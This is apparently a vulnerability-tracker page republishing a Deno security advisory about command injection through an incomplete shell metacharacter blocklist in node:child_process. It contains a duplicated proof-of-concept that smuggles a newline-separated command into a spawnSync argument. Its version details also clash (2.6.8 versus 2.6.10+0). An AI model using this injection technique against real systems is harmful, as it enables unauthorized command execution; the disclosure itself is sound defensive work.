Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.1
Deno Command Injection Allows Malicious Scripts to Run
JLSEC-2026-116
Summary
A Deno update is required to fix a security issue that lets attackers run unauthorized scripts. This affects Deno users who have not updated to version 2.6.8. To stay safe, update Deno to the latest version.
What to do
- Update deno_jll to version 2.6.10+0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno_jll | <= 2.6.10+0 | 2.6.10+0 |
Original title
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Original description
## Summary
A command injection vulnerability exists in Deno's `node:child_process` implementation.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
A command injection vulnerability exists in Deno's `node:child_process` implementation.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
osv CVSS3.1
8.1
- https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c URL
- https://github.com/denoland/deno/releases/tag/v2.6.8 URL
- https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr URL
- https://nvd.nist.gov/vuln/detail/CVE-2026-27190 URL
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr URL
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026